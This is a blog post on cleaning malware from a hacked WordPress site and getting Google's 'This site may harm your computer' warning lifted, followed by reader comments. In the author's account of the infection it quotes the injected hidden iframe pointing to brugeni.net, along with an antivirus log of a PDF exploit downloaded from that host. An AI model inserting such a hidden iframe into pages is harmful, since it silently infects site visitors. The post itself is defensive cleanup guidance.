I run a website on seo and recently its acting weird with the following messages in google search results and when i access it. When i do a site:mywebsite.com search in google, i get a message below the search result stating that ‘This site may harm your computer.’ which is making me lose visitors, apart from which iam not able to access my website. What may be the problem, because when i try to visit my website i get a message stating that – ‘Reported Attack Site!’ and it says that my website is trying to install programs which can steal private information or damage the visitors computers but i run a genuine information website and have no downloads nor any illegal material. What may be the solution for this problem and is my website hacked? – Question by a Reader through Phone
First of all you need to understand that these are some badware warning against malicious software which is given by Google through stopbadware.org which warns all the google searchers against visiting websites which can be harmful to them. You need to detect malware and also visit the google safe browsing section which lists all the information about different websites and if they were listed as suspicious in the last 90days.
Sometimes because of some wrong permissions on your website scripts like wordpress or when you have easy passwords for your FTP accounts, your websites can be compromised after which these hackers would add some malicious links within your content or in the footer section using direct links with visibility=0 or else using iFrames. You need to continuously make sure that your websites content is secure and you have no links placed by the hackers anywhere on your ftp.
Read this wordpress security guide which can give you some important points you need to make note of while running a blog and also here are some plugins which you need to run on your wordpress blog to make sure you can regularly scan for the content of your blog and all he plugin files and theme files.
My Experience :
Recently after making a quick check on my blog, i found that there were some iframe codes added to my blogs homepage which i could not detect but a friend anurag messaged me about the same. The website was not accessible to him because his Antivirus Software ‘nod32’ could detect and disallowed him to access the website with a virus message. His antivirus software even removed the virus from his PC which got downloaded, and then he recieved the following message :
HTTP filter file http://brugeni.net/p1d2f3.php?id=2038730&vis=1 PDF/Exploit.Pidief.OJS.Gen trojan connection terminated – quarantined Anurag\Ozakx Threat was detected upon access to web by the application: C:\Program Files\Mozilla Firefox\firefox.exe.
When i visited the footer.php & index.php file of my wordpress installation i found the following iframe added to the files at the end which is the reason the homepage was continiously loading like a loop and was also breaking the theme files, though as a normal user anyone cannot find out this malicious code in the blog, unless the antivirus softwares can find them.
<iframe src=”http://brugeni.net/?click=44E729″ width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
Solution for Removing the iFrames :
There are several wordpress plugins which can help you stay secure by checking all the file permissions, blog content and your ftp files. Here are few recommendations :
- WP Security Scan –
Scans your WordPress installation for security vulnerabilities and suggests corrective actions. You need to install this plugin in your wordpress blog and then activate it, following which you will find a complete new menu called as ‘WP – Security Admin Tools’ where you can find all the System Information & links to scanner where you can find all the current permissions of the files under your root folder and the permissions you need to change for more security.
-passwords
-file permissions
-database security
-version hiding
-WordPress admin protection/security - Secure WP Plugin
This plugin is very useful because it does a lot of stuff by creating some pages which can be accessed by others and removing info from your website which should not be allowed to be accessed by others.
# removes error-information on login-page
# adds index.html to plugin-directory (virtual)
# removes the wp-version, except in admin-area
# removes Really Simple Discovery
# removes Windows Live Writer
# remove core update information for non-admins
# remove plugin-update information for non-admins
Steps to Remove the Warning :
Once the warning is shown for your website, expect 0% visitors for your website from Google because the warning message will block the visitors from entering into the site. You need to get this warning removed by Google as soon as possible and for this the very first step would be to remove the malicious links, hackers codes or any other stuff which was the cause of this warning. Once you are sure that you have found the problem and removed those codes you need to proceed to the next step of contacting Google.
Login to your Google Webmaster tools account which is also useful for regaining google rankings. You need to make sure you have added your website in the Webmaster Tools by confirming that you are owner by adding the ‘Meta’ code or uploading a file which it offers you. Once this is done you need to perform the following 3 steps and wait for Google Webmaster Team to review your website and confirm that your website does not distribute badware or hosts it.
1. On the Webmaster Tools Home page, select the site you want.
2. In the Parts of this site may be distributing malware message, click More details.
3. Click Request a review.
Previously it used to take a lot of time for this procedure but nowadays within 2-3days time frame the websites are reviewed and the warning is removed. Let me know if you have any questions about this problem and if your website is attacked with any of this kind of problems.
Sajan says
Dear Amit, I can see there are many internal links within every post in your blog. In this article, too, I see a number of post links within (ie. badware warning, detect malware, google safe browsing…etc all are linked with other articles in your same blog). How do you do this? Do you use any plugin or you make the links manually? Please teach us. Waiting for your answer.
Amit Bhawani says
@Sajan, I manually link to the related articles within the post content, even though there are some wordpress plugins which can make this job automated. Will write about the plugins soon!
ravikant says
good one
pankaj singla says
thanks a lot amit
you r geninus. i am a new blogger in wordpress and i have suffered this problem twice within this week. plz tell is the above state plugin is sufficient for security of the wordpress blog. or anything else to do.
plz tell
pankaj
Pramod Maloo says
Hi Amit. I have similar warning messages when someone types http://www.kreativemachinez.com. My programmer suggested it was some issue with automatically adding of ifrmae. We removed it but it is getting to add on its own. Also when the page opens..I noticed there is redirection from .ru.com
Can you plz help.
Shiv says
Hi amit.. I get this message, Warning – visiting this web site may harm your computer! upon entering the website http://www.techved.com. Why is this so? How do I remove it.
Indian Share Tips says
I am facing the problem with the issue at Indian-Share-Tips.Com which is a highly trusted site for Indian stock market.
Can you help me to resolve the issue as my readers are getting the message.
Regards
Anil kumar says
Hi
Please help m to remove this error message that “This site may harm your computer”. Also it shows that your website is infected with some badwares even i have installed Antimalware on my Laptop scanned my whole website with that but no badware code is detected. kindly help me to rectify this error message
Ashok says
I have also same problems… Please help me to remove this error message that “This site may harm your computer”. we have not find any malicious code our site..www.easyghar.com. Also it shows that your website is infected with some badwares. kindly help me to rectify this error message
ramkumar says
My site http://www.rajaramsystems.com was infected.
Bahy says
How did you remove the bad code on your site ? Can you let me know ?
hitgrove says
i was really suffering for this issue.. thanks a llott for sharing it sir